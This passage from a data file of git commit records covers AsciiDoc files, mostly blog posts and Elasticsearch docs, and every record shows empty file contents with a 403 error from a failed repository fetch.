pom","message":"Sample pom\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"IBM Cloud.adoc","new_file":"IBM Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30c77d9bf8a504a98428c3377a50ba75769772dd","subject":"Update 2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","message":"Update 2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","new_file":"_posts\/2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b2b614372f10874ebc37bc8246787b6e8ecd679","subject":"Update 2017-04-05-again.adoc","message":"Update 2017-04-05-again.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-05-again.adoc","new_file":"_posts\/2017-04-05-again.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc5168db082f10df159f37097c4902271e4828f1","subject":"Delete the file at '_posts\/2017-05-03-Intro.adoc'","message":"Delete the file at '_posts\/2017-05-03-Intro.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"768fb83b46539e0c1fa1e7e814a9da24fa096541","subject":"Update 2017-07-28-mecab.adoc","message":"Update 2017-07-28-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-mecab.adoc","new_file":"_posts\/2017-07-28-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b119f1a5dfbf16eef1054b426ee8f2966cbf822a","subject":"Update 2016-04-12-test.adoc","message":"Update 2016-04-12-test.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-04-12-test.adoc","new_file":"_posts\/2016-04-12-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f39cced6c0d4ec78e39bab4a4dbd71d2aa0cc168","subject":"Update 2014-12-30-Code-metrics.adoc","message":"Update 2014-12-30-Code-metrics.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-12-30-Code-metrics.adoc","new_file":"_posts\/2014-12-30-Code-metrics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb6cae3e5db72b2bfda04fde8fcada8abe49b8bc","subject":"Update 2018-04-20-Java-Puzzles.adoc","message":"Update 2018-04-20-Java-Puzzles.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-04-20-Java-Puzzles.adoc","new_file":"_posts\/2018-04-20-Java-Puzzles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32978edc23d996647b651be80a9957f615c4f0af","subject":"Update 2018-07-13-test20180713.adoc","message":"Update 
2018-07-13-test20180713.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-13-test20180713.adoc","new_file":"_posts\/2018-07-13-test20180713.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25ee0cd50ab0b47d71f3fe26db2dd3082bc0f0d4","subject":"Update 2016-05-08-Query-Optimization-101.adoc","message":"Update 2016-05-08-Query-Optimization-101.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-05-08-Query-Optimization-101.adoc","new_file":"_posts\/2016-05-08-Query-Optimization-101.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2398804f29c28daf16055d8dfe45476a6b284470","subject":"Update 2016-11-08-181300-Tuesday-Workday.adoc","message":"Update 2016-11-08-181300-Tuesday-Workday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-08-181300-Tuesday-Workday.adoc","new_file":"_posts\/2016-11-08-181300-Tuesday-Workday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34cf97760e5d76ade47439af706052981f5add50","subject":"Update 2018-07-12-Architectural-Thinking.adoc","message":"Update 2018-07-12-Architectural-Thinking.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-07-12-Architectural-Thinking.adoc","new_file":"_posts\/2018-07-12-Architectural-Thinking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"241e0743b7beda0e026c4221fe82f35188face5c","subject":"Added snapshot","message":"Added snapshot\n","repos":"bodiam\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,yole\/asciidoctor-intellij-plugin,yole\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,McPringle\/asciidoctor-intellij-plugin,ehmkah\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,yole\/asciidoctor-intellij-plugin,asciidoctor\/asciidoctor-intellij-plugin,ehmkah\/asciidoctor-intellij-plugin,harrol\/asciidoctor-intellij-plugin,ehmkah\/asciidoctor-intellij-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ehmkah\/asciidoctor-intellij-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9568a854c6b1682d88afae749a764d78b76b7539","subject":"Update 2015-12-14-Foo.adoc","message":"Update 
2015-12-14-Foo.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2015-12-14-Foo.adoc","new_file":"_posts\/2015-12-14-Foo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f6184e3a725a5da76d867fb47f65ea54d23a5fb","subject":"Update 2016-7-2-thinphp.adoc","message":"Update 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-2-thinphp.adoc","new_file":"_posts\/2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30e50939cc36ddc2f0bf5e238fabda7ffb8b9512","subject":"Update 2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","message":"Update 2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"891a15db22357857c1422608df9551e215136af6","subject":"Add breaking changes for 6.0","message":"Add breaking changes for 
6.0\n","repos":"wuranbo\/elasticsearch,winstonewert\/elasticsearch,naveenhooda2000\/elasticsearch,lks21c\/elasticsearch,C-Bish\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,artnowo\/elasticsearch,s1monw\/elasticsearch,Shepard1212\/elasticsearch,i-am-Nathan\/elasticsearch,gfyoung\/elasticsearch,a2lin\/elasticsearch,JervyShi\/elasticsearch,mohit\/elasticsearch,jimczi\/elasticsearch,obourgain\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,gmarz\/elasticsearch,fforbeck\/elasticsearch,nilabhsagar\/elasticsearch,uschindler\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,MisterAndersen\/elasticsearch,mikemccand\/elasticsearch,njlawton\/elasticsearch,spiegela\/elasticsearch,naveenhooda2000\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,StefanGor\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,mjason3\/elasticsearch,maddin2016\/elasticsearch,nazarewk\/elasticsearch,nilabhsagar\/elasticsearch,MaineC\/elasticsearch,MisterAndersen\/elasticsearch,robin13\/elasticsearch,alexshadow007\/elasticsearch,bawse\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,pozhidaevak\/elasticsearch,rlugojr\/elasticsearch,JervyShi\/elasticsearch,nknize\/elasticsearch,mjason3\/elasticsearch,gmarz\/elasticsearch,yanjunh\/elasticsearch,nilabhsagar\/elasticsearch,glefloch\/elasticsearch,a2lin\/elasticsearch,jprante\/elasticsearch,scorpionvicky\/elasticsearch,Helen-Zhao\/elasticsearch,kalimatas\/elasticsearch,elasticdog\/elasticsearch,gingerwizard\/elasticsearch,njlawton\/elasticsearch,henakamaMSFT\/elasticsearch,JSCooke\/elasticsearch,StefanGor\/elasticsearch,brandonkearby\/elasticsearch,nknize\/elasticsearch,Helen-Zhao\/elasticsearch,JackyMai\/elasticsearch,artnowo\/elasticsearch,ricardocerq\/elasticsearch,Shepard1212\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,JSCooke\/elasticsearch,sneivandt\/elasticsearch,MaineC\/elasticsearch,bawse\/elasticsearch,pozhidaevak\/elasticsearch,bawse\/elasticsearch,wuranbo\/elasticsearch,elasticdog\/elasticsearch,ZTE-PaaS\/elasticsearch,LeoYao\/elasticsearch,Helen-Zhao\/elasticsearch,lks21c\/elasticsearch,fernandozhu\/elasticsearch,nazarewk\/elasticsearch,coding0011\/elasticsearch,MisterAndersen\/elasticsearch,nazarewk\/elasticsearch,fred84\/elasticsearch,IanvsPoplicola\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,fernandozhu\/elasticsearch,rlugojr\/elasticsearch,GlenRSmith\/elasticsearch,elasticdog\/elasticsearch,mohit\/elasticsearch,henakamaMSFT\/elasticsearch,winstonewert\/elasticsearch,ZTE-PaaS\/elasticsearch,wenpos\/elasticsearch,wangtuo\/elasticsearch,mikemccand\/elasticsearch,IanvsPoplicola\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,a2lin\/elasticsearch,mikemccand\/elasticsearch,njlawton\/elasticsearch,LeoYao\/elasticsearch,winstonewert\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,sneivandt\/elasticsearch,umeshdangat\/elasticsearch,LeoYao\/elasticsearch,MaineC\/elasticsearch,IanvsPoplicola\/elasticsearch,fforbeck\/elasticsearch,sneivandt\/elasticsearch,geidies\/elasticsearch,C-Bish\/elasticsearch,s1monw\/elasticsearch,mortonsykes\/elasticsearch,rajanm\/elasticsearch,mortonsykes\/elasticsearch,njlawton\/elasticsearch,artnowo\/elasticsearch,glefloch\/elasticsearch,dongjoon-hyun\/elasticsearch,nknize\/elasticsearch,naveenhooda2000\/elasticsearch,Shepard1212\/elasticsearch,kalimatas\/elasticsearch,winstonewert\/elasticsearch,liweinan0423\/elasticsear
ch,gfyoung\/elasticsearch,alexshadow007\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,robin13\/elasticsearch,geidies\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,yanjunh\/elasticsearch,i-am-Nathan\/elasticsearch,artnowo\/elasticsearch,geidies\/elasticsearch,masaruh\/elasticsearch,JSCooke\/elasticsearch,mortonsykes\/elasticsearch,obourgain\/elasticsearch,wuranbo\/elasticsearch,MaineC\/elasticsearch,mikemccand\/elasticsearch,bawse\/elasticsearch,liweinan0423\/elasticsearch,JervyShi\/elasticsearch,dongjoon-hyun\/elasticsearch,lks21c\/elasticsearch,LewayneNaidoo\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,masaruh\/elasticsearch,Stacey-Gammon\/elasticsearch,dongjoon-hyun\/elasticsearch,spiegela\/elasticsearch,Stacey-Gammon\/elasticsearch,GlenRSmith\/elasticsearch,jprante\/elasticsearch,wangtuo\/elasticsearch,masaruh\/elasticsearch,wangtuo\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,rlugojr\/elasticsearch,fred84\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elasticassandra,obourgain\/elasticsearch,markwalkom\/elasticsearch,henakamaMSFT\/elasticsearch,i-am-Nathan\/elasticsearch,nilabhsagar\/elasticsearch,dongjoon-hyun\/elasticsearch,henakamaMSFT\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,maddin2016\/elasticsearch,HonzaKral\/elasticsearch,shreejay\/elasticsearch,glefloch\/elasticsearch,mjason3\/elasticsearch,ricardocerq\/elasticsearch,shreejay\/elasticsearch,fernandozhu\/elasticsearch,naveenhooda2000\/elasticsearch,wuranbo\/elasticsearch,IanvsPoplicola\/elasticsearch,a2lin\/elasticsearch,uschindler\/elasticsearch,MisterAndersen\/elasticsearch,ZTE-PaaS\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,brandonkearby\/elasticsearch,njlawton\/elasticsearch,JackyMai\/elasticsearch,vroyer\/elasticassandra,scottsom\/elasticsearch,scottsom\/elasticsearch,C-Bish\/elasticsearch,fred84\/elasticsearch,gfyoung\/elasticsearch,C-Bish\/elasticsearch,StefanGor\/elasticsearch,rlugojr\/elasticsearch,qwerty4030\/elasticsearch,shreejay\/elasticsearch,alexshadow007\/elasticsearch,i-am-Nathan\/elasticsearch,uschindler\/elasticsearch,jprante\/elasticsearch,geidies\/elasticsearch,ZTE-PaaS\/elasticsearch,ricardocerq\/elasticsearch,glefloch\/elasticsearch,jprante\/elasticsearch,vroyer\/elassandra,MaineC\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wenpos\/elasticsearch,rajanm\/elasticsearch,wangtuo\/elasticsearch,HonzaKral\/elasticsearch,elasticdog\/elasticsearch,liweinan0423\/elasticsearch,pozhidaevak\/elasticsearch,gmarz\/elasticsearch,a2lin\/elasticsearch,bawse\/elasticsearch,wenpos\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,obourgain\/elasticsearch,LewayneNaidoo\/elasticsearch,Stacey-Gammon\/elasticsearch,mortonsykes\/elasticsearch,fred84\/elasticsearch,nezirus\/elasticsearch,liweinan0423\/elasticsearch,jimczi\/elasticsearch,GlenRSmith\/elasticsearch,wenpos\/elasticsearch,nazarewk\/elasticsearch,Stacey-Gammon\/elasticsearch,Shepard1212\/elasticsearch,mohit\/elasticsearch,mjason3\/elasticsearch,liweinan0423\/elasticsearch,LeoYao\/elasticsearch,henakamaMSFT\/elasticsearch,wuranbo\/elasticsearch,coding0011\/elasticsearch,fforbeck\/elasticsearch,JackyMai\/elasticsearch,yanjunh\/elasticsearch,scottsom\/elasticsearch,maddin2016\/elasticsearch,scottsom\/elasticsearch,JervyShi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,scorp
ionvicky\/elasticsearch,StefanGor\/elasticsearch,rajanm\/elasticsearch,fernandozhu\/elasticsearch,uschindler\/elasticsearch,ZTE-PaaS\/elasticsearch,ricardocerq\/elasticsearch,lks21c\/elasticsearch,umeshdangat\/elasticsearch,LewayneNaidoo\/elasticsearch,nezirus\/elasticsearch,gmarz\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,mjason3\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,jimczi\/elasticsearch,i-am-Nathan\/elasticsearch,GlenRSmith\/elasticsearch,yanjunh\/elasticsearch,C-Bish\/elasticsearch,alexshadow007\/elasticsearch,mikemccand\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elasticassandra,obourgain\/elasticsearch,MisterAndersen\/elasticsearch,artnowo\/elasticsearch,jprante\/elasticsearch,nezirus\/elasticsearch,spiegela\/elasticsearch,s1monw\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,Helen-Zhao\/elasticsearch,scorpionvicky\/elasticsearch,fforbeck\/elasticsearch,fernandozhu\/elasticsearch,qwerty4030\/elasticsearch,JackyMai\/elasticsearch,alexshadow007\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ricardocerq\/elasticsearch,brandonkearby\/elasticsearch,mortonsykes\/elasticsearch,Helen-Zhao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,naveenhooda2000\/elasticsearch,JervyShi\/elasticsearch,umeshdangat\/elasticsearch,vroyer\/elassandra,yanjunh\/elasticsearch,spiegela\/elasticsearch,shreejay\/elasticsearch,spiegela\/elasticsearch,LewayneNaidoo\/elasticsearch,vroyer\/elassandra,nazarewk\/elasticsearch,coding0011\/elasticsearch,LewayneNaidoo\/elasticsearch,StefanGor\/elasticsearch,coding0011\/elasticsearch,nilabhsagar\/elasticsearch,JSCooke\/elasticsearch,jimczi\/elasticsearch,LeoYao\/elasticsearch,winstonewert\/elasticsearch,brandonkearby\/elasticsearch,maddin2016\/elasticsearch,glefloch\/elasticsearch,rlugojr\/elasticsearch,HonzaKral\/elasticsearch,brandonkearby\/elasticsearch,dongjoon-hyun\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,fred84\/elasticsearch,JSCooke\/elasticsearch,JervyShi\/elasticsearch,kalimatas\/elasticsearch,strapdata\/elassandra,maddin2016\/elasticsearch,fforbeck\/elasticsearch,gmarz\/elasticsearch,strapdata\/elassandra,umeshdangat\/elasticsearch,Shepard1212\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,JackyMai\/elasticsearch,coding0011\/elasticsearch,geidies\/elasticsearch,sneivandt\/elasticsearch,Stacey-Gammon\/elasticsearch,markwalkom\/elasticsearch,elasticdog\/elasticsearch","old_file":"docs\/reference\/migration\/migrate_6_0.asciidoc","new_file":"docs\/reference\/migration\/migrate_6_0.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f3dbbc41dcb527d7f436b97e020ea1eafa3dbe5","subject":"Add \"getting started\" guide","message":"Add \"getting started\" guide\n","repos":"martin-helmich\/flow-metamorph,mittwald\/flow-metamorph","old_file":"Documentation\/GettingStarted.adoc","new_file":"Documentation\/GettingStarted.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mittwald\/flow-metamorph.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7df133f65f668a2a2c9365c4b6edaf1c6eba24bd","subject":"Update 2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","message":"Update 
2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ad550dc763f98a27287723f370a68cc2a464619","subject":"Publish 2017-02-25adocadoc-part-1.adoc","message":"Publish 2017-02-25adocadoc-part-1.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adocadoc-part-1.adoc","new_file":"2017-02-25adocadoc-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cb9af93a37138563a868d76268fb253224db2c6","subject":"Update 2016-03-29-Zonas-de-transferencia.adoc","message":"Update 2016-03-29-Zonas-de-transferencia.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f520acb66e8eddb0d1391b6a3747951cf1627f18","subject":"y2b create post Basketball With Watson","message":"y2b create post Basketball With Watson","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-01-Basketball-With-Watson.adoc","new_file":"_posts\/2016-10-01-Basketball-With-Watson.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"295ae619f3d11e9b52220dc2d522ce5381700c19","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccb5137b6cc18e7de376c083d48d86bd1b0628e9","subject":"Install clearer","message":"Install clearer\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"5b5306ea8252fce2ab64cf4ba89bae3fdc43a748","subject":"Add an indices-upgrade section to the docs redirects.","message":"Add an indices-upgrade section to the docs redirects.\n","repos":"alexshadow007\/elasticsearch,scottsom\/elasticsearch,Shepard1212\/elasticsearch,nazarewk\/elasticsearch,nilabhsagar\/elasticsearch,scottsom\/elasticsearch,i-am-Nathan\/elasticsearch,wuranbo\/elasticsearch,fernandozhu\/elasticsearch,gingerwizard\/elasticsearch,glefloch\/elasticsearch,a2lin\/elasticsearch,ZTE-PaaS\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nilabhsagar\/elasticsearch,IanvsPoplicola\/elasticsearch,JervyShi\/elasticsearch,shreejay\/elasticsearch,scottsom\/elasticsearch,spiegela\/elasticsearch,jprante\/elasticsearch,C-Bish\/elasticsearch,Helen-Zhao\/elasticsearch,mikemccand\/elasticsearch,markwalkom\/elasticsearch,wuranbo\/elasticsearch,wangtuo\/elasticsearch,naveenhooda2000\/elasticsearch,ZTE-PaaS\/elasticsearch,masaruh\/elasticsearch,winstonewert\/elasticsearch,Helen-Zhao\/elasticsearch,liweinan0423\/elasticsearch,gmarz\/elasticsearch,Stacey-Gammon\/elasticsearch,mjason3\/elasticsearch,alexshadow007\/elasticsearch,nezirus\/elasticsearch,JervyShi\/elasticsearch,rajanm\/elasticsearch,alexshadow007\/elasticsearch,elasticdog\/elasticsearch,spiegela\/elasticsearch,JackyMai\/elasticsearch,fernandozhu\/elasticsearch,glefloch\/elasticsearch,MaineC\/elasticsearch,sneivandt\/elasticsearch,coding0011\/elasticsearch,ZTE-PaaS\/elasticsearch,GlenRSmith\/elasticsearch,JervyShi\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MisterAndersen\/elasticsearch,nezirus\/elasticsearch,jimczi\/elasticsearch,MaineC\/elasticsearch,mohit\/elasticsearch,brandonkearby\/elasticsearch,umeshdangat\/elasticsearch,winstonewert\/elasticsearch,JackyMai\/elasticsearch,MaineC\/elasticsearch,lks21c\/elasticsearch,markwalkom\/elasticsearch,qwerty4030\/elasticsearch,StefanGor\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,pozhidaevak\/elasticsearch,StefanGor\/elasticsearch,mohit\/elasticsearch,mortonsykes\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MaineC\/elasticsearch,yanjunh\/elasticsearch,maddin2016\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,nknize\/elasticsearch,StefanGor\/elasticsearch,liweinan0423\/elasticsearch,lks21c\/elasticsearch,njlawton\/elasticsearch,C-Bish\/elasticsearch,nilabhsagar\/elasticsearch,geidies\/elasticsearch,pozhidaevak\/elasticsearch,C-Bish\/elasticsearch,wangtuo\/elasticsearch,ZTE-PaaS\/elasticsearch,rlugojr\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,elasticdog\/elasticsearch,JSCooke\/elasticsearch,winstonewert\/elasticsearch,vroyer\/elasticassandra,qwerty4030\/elasticsearch,uschindler\/elasticsearch,henakamaMSFT\/elasticsearch,s1monw\/elasticsearch,yanjunh\/elasticsearch,artnowo\/elasticsearch,mortonsykes\/elasticsearch,umeshdangat\/elasticsearch,fernandozhu\/elasticsearch,bawse\/elasticsearch,pozhidaevak\/elasticsearch,obourgain\/elasticsearch,robin13\/elasticsearch,LewayneNaidoo\/elasticsearch,strapdata\/elassandra,bawse\/elasticsearch,naveenhooda2000\/elasticsearch,kalimatas\/elasticsearch,brandonkearby\/elasticsearch,JSCooke\/elasticsearch,vroyer\/elasticassandra,fforbeck\/elasticsearch,masaruh\/elasticsearch,winstonewert\/elasticsearch,henakamaMSFT\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elasticsearch,geidies\/elasticsearch,wenpos\/elasticsearch,spiegela\/elasticsearch,mohit\/elasticsearch,jprante\/elasticsearch,henakamaMSFT\/elasticsearch,naveenhooda200
